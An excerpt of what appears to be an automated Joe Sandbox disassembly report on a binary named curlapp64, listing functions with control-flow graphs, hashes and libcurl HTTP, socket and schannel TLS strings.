                                                                                                                                                                                                  • String ID: Recv failure: %s$recv(len=%zu) -> %d, err=%d
                                                                                                                                                                                                  • API String ID: 2514157807-2495832097
                                                                                                                                                                                                  • Opcode ID: bed5f14da304bbb2045fd42038e80d1795d9aec1cf0dcfeb36a033d7ec83f45d
                                                                                                                                                                                                  • Instruction ID: 36afc37c5bb011be983bbb889acd07aab127a491333ac30ab748e7a3dc845eb3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bed5f14da304bbb2045fd42038e80d1795d9aec1cf0dcfeb36a033d7ec83f45d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A431B072A087818AE6219F2AA8517AD77A0BF89BD4F004135DF5D077A9DF3CE081C700
                                                                                                                                                                                                  Function 00007FF8B7E863C0 Relevance: 82.9, APIs: 15, Strings: 32, Instructions: 624COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                  • String ID: HTTP/%s%s%s%s%s%s%s%s%s%s%s%s%s$%s $%s: %s, %02d %s %4d %02d:%02d:%02d GMT$%s?%s$1.0$1.1$Accept$Accept-Encoding$Accept-Encoding: %s$Accept: */*$Alt-Used$Alt-Used: %s:%d$Connection$Connection: %s%sTETE: gzip$Content-Range$Content-Range: bytes %s%lld/%lld$Content-Range: bytes %s/%lld$Content-Range: bytes 0-%lld/%lld$GET$HEAD$HTTP request too large$If-Modified-Since$If-Unmodified-Since$Invalid TIMEVALUE$Last-Modified$Proxy-Connection$Proxy-Connection: Keep-Alive$Range$Range: bytes=%s$Referer$Referer: %s$User-Agent
                                                                                                                                                                                                  • API String ID: 1294909896-1770648156
                                                                                                                                                                                                  • Opcode ID: d01dbf821eb6e50b7745be4e05e57908a55b81103d6f5f03b7adfae2cab5ceb3
                                                                                                                                                                                                  • Instruction ID: 88ac88c54bcc6089cb5fa50475d5c612641b6d5ac947232519385d2a4df5662f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d01dbf821eb6e50b7745be4e05e57908a55b81103d6f5f03b7adfae2cab5ceb3
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A9524C62A08B8285FB659B69A4403BD27A0AF45FC8F984035DF4E5B7ABDF3CE544C350
                                                                                                                                                                                                  Function 00007FF8B7E679F0 Relevance: 47.6, APIs: 17, Strings: 10, Instructions: 303networkCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 630 7ff8b7e679f0-7ff8b7e67a53 call 7ff8b7eb3b60 call 7ff8b7e68230 635 7ff8b7e67a55-7ff8b7e67a75 call 7ff8b7e6c990 630->635 636 7ff8b7e67ac6-7ff8b7e67acd 630->636 644 7ff8b7e67b2e-7ff8b7e67b35 635->644 645 7ff8b7e67a7b-7ff8b7e67ac1 _errno * 3 call 7ff8b7eaec40 call 7ff8b7e74a70 635->645 638 7ff8b7e67acf-7ff8b7e67ae1 call 7ff8b7e68110 636->638 639 7ff8b7e67ae8-7ff8b7e67b2d call 7ff8b7e74bb0 call 7ff8b7ec9e10 636->639 638->639 648 7ff8b7e67b65 644->648 649 7ff8b7e67b37-7ff8b7e67b63 setsockopt 644->649 645->636 652 7ff8b7e67b6c-7ff8b7e67b89 call 7ff8b7e74b60 648->652 649->652 658 7ff8b7e67b8b-7ff8b7e67b8e 652->658 659 7ff8b7e67b90-7ff8b7e67b95 652->659 658->659 660 7ff8b7e67bfb 658->660 659->660 661 7ff8b7e67b97-7ff8b7e67ba0 659->661 662 7ff8b7e67bfe-7ff8b7e67c21 660->662 661->662 663 7ff8b7e67ba2-7ff8b7e67bcd setsockopt 661->663 664 7ff8b7e67c5c-7ff8b7e67c5f 662->664 665 7ff8b7e67c23-7ff8b7e67c42 call 7ff8b7ebc700 662->665 663->662 666 7ff8b7e67bcf-7ff8b7e67bf9 WSAGetLastError call 7ff8b7eaec40 call 7ff8b7e74b60 663->666 668 7ff8b7e67c61-7ff8b7e67c86 getsockopt 664->668 669 7ff8b7e67cb3-7ff8b7e67cb6 664->669 681 7ff8b7e67c44-7ff8b7e67c4e 665->681 682 7ff8b7e67c50-7ff8b7e67c5a 665->682 666->662 673 7ff8b7e67c88-7ff8b7e67c90 668->673 674 7ff8b7e67c92-7ff8b7e67cad setsockopt 668->674 675 7ff8b7e67cbc-7ff8b7e67cc3 669->675 676 7ff8b7e67df8-7ff8b7e67e00 669->676 673->669 673->674 674->669 675->676 677 7ff8b7e67cc9-7ff8b7e67cf7 setsockopt 675->677 679 7ff8b7e67e43 676->679 680 7ff8b7e67e02-7ff8b7e67e2e call 7ff8b7e98350 * 2 676->680 683 7ff8b7e67cf9-7ff8b7e67d06 WSAGetLastError 677->683 684 7ff8b7e67d0b-7ff8b7e67d3d call 7ff8b7ebc970 setsockopt 677->684 687 7ff8b7e67e46-7ff8b7e67e4d 679->687 715 7ff8b7e67e35-7ff8b7e67e37 680->715 716 7ff8b7e67e30-7ff8b7e67e33 680->716 681->669 682->668 688 7ff8b7e67dea-7ff8b7e67df3 call 7ff8b7e74b60 683->688 698 7ff8b7e67d3f-7ff8b7e67d55 WSAGetLastError call 7ff8b7e74b60 684->698 699 7ff8b7e67d5a-7ff8b7e67d8c call 7ff8b7ebc970 setsockopt 684->699 691 7ff8b7e67e4f-7ff8b7e67e52 687->691 692 7ff8b7e67e54-7ff8b7e67e78 call 7ff8b7e8ec50 call 7ff8b7e67410 687->692 688->676 691->692 693 7ff8b7e67e8d-7ff8b7e67e95 call 7ff8b7e9c2d0 691->693 692->693 712 7ff8b7e67e7a-7ff8b7e67e7d 692->712 706 7ff8b7e67e9a-7ff8b7e67e9c 693->706 698->699 713 7ff8b7e67d8e-7ff8b7e67da4 WSAGetLastError call 7ff8b7e74b60 699->713 714 7ff8b7e67da9-7ff8b7e67ddb call 7ff8b7ebc970 setsockopt 699->714 710 7ff8b7e67e9e-7ff8b7e67eb0 WSAGetLastError 706->710 711 7ff8b7e67eb5-7ff8b7e67ec6 706->711 710->636 711->636 717 7ff8b7e67ecc-7ff8b7e67ecf 711->717 712->636 718 7ff8b7e67e83-7ff8b7e67e88 712->718 713->714 714->676 725 7ff8b7e67ddd-7ff8b7e67de3 WSAGetLastError 714->725 715->679 720 7ff8b7e67e39-7ff8b7e67e3e 715->720 716->687 717->639 722 7ff8b7e67ed5-7ff8b7e67efa call 7ff8b7e67f90 call 7ff8b7eb3b60 717->722 718->636 720->636 722->639 725->688
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast$setsockopt$_errno$CountCounterPerformanceQueryTickgetsocknamegetsockopthtonsinet_ntop
                                                                                                                                                                                                  • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$Could not set TCP_NODELAY: %s$Failed to set SO_KEEPALIVE on fd %qd: errno %d$Failed to set TCP_KEEPCNT on fd %qd: errno %d$Failed to set TCP_KEEPIDLE on fd %qd: errno %d$Failed to set TCP_KEEPINTVL on fd %qd: errno %d$cf_socket_open() -> %d, fd=%qd$sa_addr inet_ntop() failed with errno %d: %s
                                                                                                                                                                                                  • API String ID: 1107047317-1591695899
                                                                                                                                                                                                  • Opcode ID: 62fbc4e65c23fe0326cbac194a222e50548c8ce86329692bfd6c74d0de9f4214
                                                                                                                                                                                                  • Instruction ID: 1727234b04b47966ff7dc0198f70018a4bab5e640b585eadb005beb60af0f1b8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 62fbc4e65c23fe0326cbac194a222e50548c8ce86329692bfd6c74d0de9f4214
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BFD17731A1878286E720CB29E4447BE2761EF85FC4F405135EB5D47AA9EF7DE589C700
                                                                                                                                                                                                  Function 00007FF8B7EBF4F0 Relevance: 37.1, APIs: 6, Strings: 15, Instructions: 334COMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 931 7ff8b7ebf4f0-7ff8b7ebf54e 932 7ff8b7ebf550-7ff8b7ebf554 931->932 933 7ff8b7ebf56a-7ff8b7ebf56f 931->933 932->933 936 7ff8b7ebf556-7ff8b7ebf565 call 7ff8b7e74b60 932->936 934 7ff8b7ebf581-7ff8b7ebf585 933->934 935 7ff8b7ebf571-7ff8b7ebf57c 933->935 939 7ff8b7ebf593-7ff8b7ebf596 934->939 940 7ff8b7ebf587-7ff8b7ebf58e 934->940 938 7ff8b7ebf8a0 935->938 947 7ff8b7ebf8b1-7ff8b7ebf8b6 936->947 944 7ff8b7ebf8a3 call 7ff8b7e74b60 938->944 942 7ff8b7ebf680-7ff8b7ebf687 939->942 943 7ff8b7ebf59c-7ff8b7ebf5a0 939->943 940->938 945 7ff8b7ebf8a8-7ff8b7ebf8ab 942->945 946 7ff8b7ebf68d-7ff8b7ebf68f 942->946 943->942 948 7ff8b7ebf5a6-7ff8b7ebf5bb 943->948 944->945 945->947 953 7ff8b7ebf9a8-7ff8b7ebf9ae 945->953 946->945 950 7ff8b7ebf695-7ff8b7ebf698 946->950 947->953 954 7ff8b7ebf8bc-7ff8b7ebf8c0 947->954 951 7ff8b7ebf5c2-7ff8b7ebf5e0 realloc 948->951 952 7ff8b7ebf5bd-7ff8b7ebf5c0 948->952 955 7ff8b7ebf6aa-7ff8b7ebf720 call 7ff8b7ebc9b0 950->955 956 7ff8b7ebf69a-7ff8b7ebf69e 950->956 960 7ff8b7ebf5e2-7ff8b7ebf5f9 call 7ff8b7e74a70 951->960 961 7ff8b7ebf5fe-7ff8b7ebf609 951->961 952->951 959 7ff8b7ebf60d-7ff8b7ebf628 call 7ff8b7e68c40 952->959 957 7ff8b7ebf9b0-7ff8b7ebf9b3 953->957 958 7ff8b7ebf9b8-7ff8b7ebf9c6 953->958 954->953 962 7ff8b7ebf8c6-7ff8b7ebf8ca 954->962 997 7ff8b7ebf722-7ff8b7ebf727 955->997 998 7ff8b7ebf734-7ff8b7ebf739 955->998 956->955 965 7ff8b7ebf6a0-7ff8b7ebf6a4 956->965 957->958 967 7ff8b7ebf9b5 957->967 968 7ff8b7ebf9c8-7ff8b7ebf9fc memmove * 2 958->968 969 7ff8b7ebf9fe-7ff8b7ebfa04 958->969 971 7ff8b7ebf62d-7ff8b7ebf634 959->971 960->947 961->959 962->953 964 7ff8b7ebf8d0-7ff8b7ebf8ef call 7ff8b7ebc700 962->964 988 7ff8b7ebf991-7ff8b7ebf9a3 call 7ff8b7e74b60 964->988 989 7ff8b7ebf8f5-7ff8b7ebf8f7 964->989 965->945 965->955 967->958 974 7ff8b7ebfa28-7ff8b7ebfa4a call 7ff8b7ec9e10 968->974 975 7ff8b7ebfa06-7ff8b7ebfa09 969->975 976 7ff8b7ebfa18-7ff8b7ebfa1b 969->976 979 7ff8b7ebf661-7ff8b7ebf664 971->979 980 7ff8b7ebf636-7ff8b7ebf63a 971->980 975->976 982 7ff8b7ebfa0b-7ff8b7ebfa13 975->982 983 7ff8b7ebfa23-7ff8b7ebfa25 976->983 984 7ff8b7ebfa1d-7ff8b7ebfa21 976->984 991 7ff8b7ebf666-7ff8b7ebf66a 979->991 992 7ff8b7ebf66c 979->992 986 7ff8b7ebf676-7ff8b7ebf678 980->986 987 7ff8b7ebf63c-7ff8b7ebf643 980->987 982->976 983->974 984->983 986->942 993 7ff8b7ebf653-7ff8b7ebf65f call 7ff8b7e74b60 987->993 994 7ff8b7ebf645-7ff8b7ebf651 call 7ff8b7e74b60 987->994 988->953 989->988 996 7ff8b7ebf8fd-7ff8b7ebf901 989->996 991->986 992->986 999 7ff8b7ebf66e-7ff8b7ebf672 992->999 993->986 994->986 996->953 997->998 1002 7ff8b7ebf729-7ff8b7ebf72e 997->1002 1003 7ff8b7ebf7b2-7ff8b7ebf7b6 998->1003 1004 7ff8b7ebf73b-7ff8b7ebf75d 998->1004 999->986 1002->998 1009 7ff8b7ebf906-7ff8b7ebf90c 1002->1009 1005 7ff8b7ebf7e6 1003->1005 1006 7ff8b7ebf7b8-7ff8b7ebf7bd 1003->1006 1010 7ff8b7ebf764-7ff8b7ebf77f realloc 1004->1010 1011 7ff8b7ebf75f-7ff8b7ebf762 1004->1011 1015 7ff8b7ebf7ea-7ff8b7ebf7f0 1005->1015 1006->1005 1012 7ff8b7ebf7bf-7ff8b7ebf7c9 1006->1012 1013 7ff8b7ebf90e-7ff8b7ebf917 1009->1013 1014 7ff8b7ebf92d-7ff8b7ebf958 call 7ff8b7eae4c0 call 7ff8b7e74b60 1009->1014 1017 7ff8b7ebf785-7ff8b7ebf78d 1010->1017 1018 7ff8b7ebf95d-7ff8b7ebf974 call 7ff8b7e74a70 1010->1018 1011->1010 1016 7ff8b7ebf791-7ff8b7ebf795 1011->1016 1012->1015 1021 7ff8b7ebf7cb-7ff8b7ebf7e4 memmove 1012->1021 1022 7ff8b7ebf921-7ff8b7ebf928 1013->1022 1023 7ff8b7ebf919 1013->1023 1014->945 1024 7ff8b7ebf7f6-7ff8b7ebf80b call 7ff8b7e74b60 1015->1024 1025 7ff8b7ebf87f-7ff8b7ebf885 1015->1025 1019 7ff8b7ebf7b0 1016->1019 1020 7ff8b7ebf797-7ff8b7ebf7ac memmove 1016->1020 1017->1016 1018->945 1019->1003 1020->1019 1021->1015 1022->938 1023->1022 1036 7ff8b7ebf816-7ff8b7ebf866 call 7ff8b7e74b60 call 7ff8b7ec1420 1024->1036 1037 7ff8b7ebf80d-7ff8b7ebf810 1024->1037 1025->942 1029 7ff8b7ebf88b-7ff8b7ebf893 1025->1029 1032 7ff8b7ebf895 1029->1032 1033 7ff8b7ebf899 1029->1033 1032->1033 1033->938 1044 7ff8b7ebf985-7ff8b7ebf98c 1036->1044 1045 7ff8b7ebf86c-7ff8b7ebf87a call 7ff8b7e74b60 1036->1045 1037->1036 1039 7ff8b7ebf979-7ff8b7ebf980 1037->1039 1039->938 1044->944 1045->942
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: memmove
                                                                                                                                                                                                  • String ID: schannel: SSL/TLS connection renegotiated$schannel: an unrecoverable error occurred in a prior call$schannel: cannot renegotiate, an error is pending$schannel: enough decrypted data is already available$schannel: failed to decrypt data, need more data$schannel: failed to read data from server: %s$schannel: recv returned CURLE_RECV_ERROR$schannel: recv returned error %d$schannel: remote party requests renegotiation$schannel: renegotiating SSL/TLS connection$schannel: renegotiation failed$schannel: server close notification received (close_notify)$schannel: server closed abruptly (missing close_notify)$schannel: server indicated shutdown in a prior call$schannel: unable to re-allocate memory
                                                                                                                                                                                                  • API String ID: 2162964266-1798541782
                                                                                                                                                                                                  • Opcode ID: f07c39b1aab5b020b78930aebd2b4b820fffa2cda4a2c97c6163a4faf2b13b97
                                                                                                                                                                                                  • Instruction ID: 81fcd05e0e93d5d7c35fd4a4adc9e13fec41d40e81a087058d04c043bdd2d3ff
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f07c39b1aab5b020b78930aebd2b4b820fffa2cda4a2c97c6163a4faf2b13b97
                                                                                                                                                                                                  • Instruction Fuzzy Hash: FAE14672A08B428AEB608F6DD49436D2BA5EF45FC8F504036DB4D5A7A8DF7CE884C741
                                                                                                                                                                                                  Function 00007FF8B7EC1A60 Relevance: 33.6, APIs: 9, Strings: 10, Instructions: 367encryptionCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 1393 7ff8b7ec1a60-7ff8b7ec1abb call 7ff8b7ec4a40 1396 7ff8b7ec1ac1-7ff8b7ec1ac6 1393->1396 1397 7ff8b7ec209d 1393->1397 1396->1397 1398 7ff8b7ec1acc-7ff8b7ec1ae1 1396->1398 1399 7ff8b7ec1ae3-7ff8b7ec1b05 malloc 1398->1399 1400 7ff8b7ec1b0b-7ff8b7ec1b12 1398->1400 1399->1400 1401 7ff8b7ec2091 1399->1401 1402 7ff8b7ec1b14-7ff8b7ec1b38 malloc 1400->1402 1403 7ff8b7ec1b3e-7ff8b7ec1b4f 1400->1403 1401->1397 1402->1401 1402->1403 1404 7ff8b7ec1bb2-7ff8b7ec1bb4 1403->1404 1405 7ff8b7ec1b51-7ff8b7ec1b64 realloc 1403->1405 1408 7ff8b7ec1c01-7ff8b7ec1c98 call 7ff8b7ebc9b0 malloc 1404->1408 1409 7ff8b7ec1bb6-7ff8b7ec1bd7 call 7ff8b7e68c40 1404->1409 1406 7ff8b7ec1b66-7ff8b7ec1ba9 call 7ff8b7e74a70 call 7ff8b7ec9e10 1405->1406 1407 7ff8b7ec1baa-7ff8b7ec1bae 1405->1407 1407->1404 1408->1401 1416 7ff8b7ec1c9e-7ff8b7ec1d19 memmove free 1408->1416 1415 7ff8b7ec1bdc-7ff8b7ec1be3 1409->1415 1418 7ff8b7ec2081 1415->1418 1419 7ff8b7ec1be9-7ff8b7ec1beb 1415->1419 1427 7ff8b7ec1d1f-7ff8b7ec1d26 1416->1427 1428 7ff8b7ec207d 1416->1428 1422 7ff8b7ec208a 1418->1422 1420 7ff8b7ec1de2-7ff8b7ec1df1 call 7ff8b7e74a70 1419->1420 1421 7ff8b7ec1bf1-7ff8b7ec1bf4 1419->1421 1436 7ff8b7ec1dfb-7ff8b7ec1e1b call 7ff8b7e74a70 1420->1436 1421->1420 1424 7ff8b7ec1bfa-7ff8b7ec1bfe 1421->1424 1422->1401 1424->1408 1430 7ff8b7ec1fd2-7ff8b7ec1fd7 1427->1430 1431 7ff8b7ec1d2c-7ff8b7ec1d33 1427->1431 1428->1418 1432 7ff8b7ec2066-7ff8b7ec206f 1430->1432 1433 7ff8b7ec1fdd-7ff8b7ec1fed call 7ff8b7eae4c0 1430->1433 1434 7ff8b7ec1d35-7ff8b7ec1d38 1431->1434 1435 7ff8b7ec1d3e-7ff8b7ec1d40 1431->1435 1432->1428 1441 7ff8b7ec1ff2-7ff8b7ec1fff 1433->1441 1434->1433 1434->1435 1439 7ff8b7ec1d47-7ff8b7ec1d4b 1435->1439 1449 7ff8b7ec1e25 1436->1449 1442 7ff8b7ec1d83-7ff8b7ec1d8a 1439->1442 1443 7ff8b7ec1d4d-7ff8b7ec1d51 1439->1443 1446 7ff8b7ec2001-7ff8b7ec2008 1441->1446 1447 7ff8b7ec2055-7ff8b7ec2061 call 7ff8b7e74a70 1441->1447 1444 7ff8b7ec1d99-7ff8b7ec1da2 1442->1444 1445 7ff8b7ec1d8c 1442->1445 1443->1442 1448 7ff8b7ec1d53-7ff8b7ec1d70 call 7ff8b7e68c60 1443->1448 1444->1439 1450 7ff8b7ec1da4-7ff8b7ec1da8 1444->1450 1445->1444 1452 7ff8b7ec200a-7ff8b7ec2011 1446->1452 1453 7ff8b7ec203f-7ff8b7ec204b call 7ff8b7e74a70 1446->1453 1447->1432 1455 7ff8b7ec1d75-7ff8b7ec1d7a 1448->1455 1456 7ff8b7ec1e2d-7ff8b7ec1e34 1449->1456 1450->1449 1457 7ff8b7ec1daa-7ff8b7ec1daf 1450->1457 1460 7ff8b7ec2013-7ff8b7ec201f call 7ff8b7e74a70 1452->1460 1461 7ff8b7ec2029-7ff8b7ec2035 call 7ff8b7e74a70 1452->1461 1453->1447 1455->1436 1462 7ff8b7ec1d7c-7ff8b7ec1d81 1455->1462 1456->1418 1464 7ff8b7ec1e3a-7ff8b7ec1e3d 1456->1464 1457->1449 1465 7ff8b7ec1db1-7ff8b7ec1dbb 1457->1465 1460->1461 1461->1453 1462->1436 1462->1442 1470 7ff8b7ec1e48-7ff8b7ec1e52 call 7ff8b7ec4a60 1464->1470 1471 7ff8b7ec1e3f 1464->1471 1465->1456 1472 7ff8b7ec1dbd-7ff8b7ec1dda memmove 1465->1472 1476 7ff8b7ec1e54-7ff8b7ec1e5b 1470->1476 1477 7ff8b7ec1e5d 1470->1477 1471->1470 1472->1408 1474 7ff8b7ec1de0 1472->1474 1474->1464 1478 7ff8b7ec1e64-7ff8b7ec1e67 1476->1478 1477->1478 1479 7ff8b7ec1f94-7ff8b7ec1f9c 1478->1479 1480 7ff8b7ec1e6d-7ff8b7ec1e9d 1478->1480 1481 7ff8b7ec1fb8-7ff8b7ec1fbc 1479->1481 1482 7ff8b7ec1f9e-7ff8b7ec1fa2 1479->1482 1487 7ff8b7ec1ea3-7ff8b7ec1eab 1480->1487 1488 7ff8b7ec1f3e-7ff8b7ec1f5f call 7ff8b7eae4c0 call 7ff8b7e74a70 1480->1488 1481->1422 1483 7ff8b7ec1fc2-7ff8b7ec1fcd call 7ff8b7ec28a0 1481->1483 1482->1422 1484 7ff8b7ec1fa8-7ff8b7ec1fb3 call 7ff8b7ec2470 1482->1484 1483->1430 1484->1481 1487->1488 1491 7ff8b7ec1eb1-7ff8b7ec1eb4 1487->1491 1502 7ff8b7ec1f64 1488->1502 1494 7ff8b7ec1eba-7ff8b7ec1ec1 1491->1494 1495 7ff8b7ec1f69-7ff8b7ec1f6c 1491->1495 1494->1495 1497 7ff8b7ec1ec7-7ff8b7ec1eee memset call 7ff8b7ec7ff0 1494->1497 1499 7ff8b7ec1f74-7ff8b7ec1f7a 1495->1499 1500 7ff8b7ec1f6e CertFreeCertificateContext 1495->1500 1497->1502 1506 7ff8b7ec1ef0-7ff8b7ec1efa 1497->1506 1499->1479 1503 7ff8b7ec1f7c-7ff8b7ec1f8b call 7ff8b7e74a70 1499->1503 1500->1499 1502->1495 1503->1479 1508 7ff8b7ec1f2d-7ff8b7ec1f3c call 7ff8b7e74a70 1506->1508 1509 7ff8b7ec1efc-7ff8b7ec1f06 1506->1509 1508->1502 1509->1508 1510 7ff8b7ec1f08-7ff8b7ec1f1a call 7ff8b7ec4560 1509->1510 1510->1502 1515 7ff8b7ec1f1c-7ff8b7ec1f2b call 7ff8b7e74a70 1510->1515 1515->1502
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Certmalloc$CertificateContextFreefreememmove$ErrorLastNameString_errnomemsetrealloc
                                                                                                                                                                                                  • String ID: SSL: failed retrieving public key from server certificate$SSL: public key does not match pinned public key$schannel: %s$schannel: Failed to read remote certificate context: %s$schannel: SNI or certificate check failed: %s$schannel: failed to receive handshake, SSL/TLS connection failed$schannel: failed to send next handshake data: sent %zd of %lu bytes$schannel: next InitializeSecurityContext failed: %s$schannel: unable to allocate memory$schannel: unable to re-allocate memory
                                                                                                                                                                                                  • API String ID: 726578228-413892695
                                                                                                                                                                                                  • Opcode ID: aa641267869b6a24f3fb729c84c6f517f54ae60286bde1ee6a6bfead1e5ded97
                                                                                                                                                                                                  • Instruction ID: 7ce602ed588876fe0085d1d84a4dc7683f69b8d64a8411cc7c97ad0bf0622337
                                                                                                                                                                                                  • Opcode Fuzzy Hash: aa641267869b6a24f3fb729c84c6f517f54ae60286bde1ee6a6bfead1e5ded97
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F023DB6A097828AEB609B29E4443AD67A4FF44BC8F544035EB4E477A5DF7CE548C700
                                                                                                                                                                                                  Function 00007FF8B7EAE4C0 Relevance: 29.9, APIs: 6, Strings: 11, Instructions: 118COMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
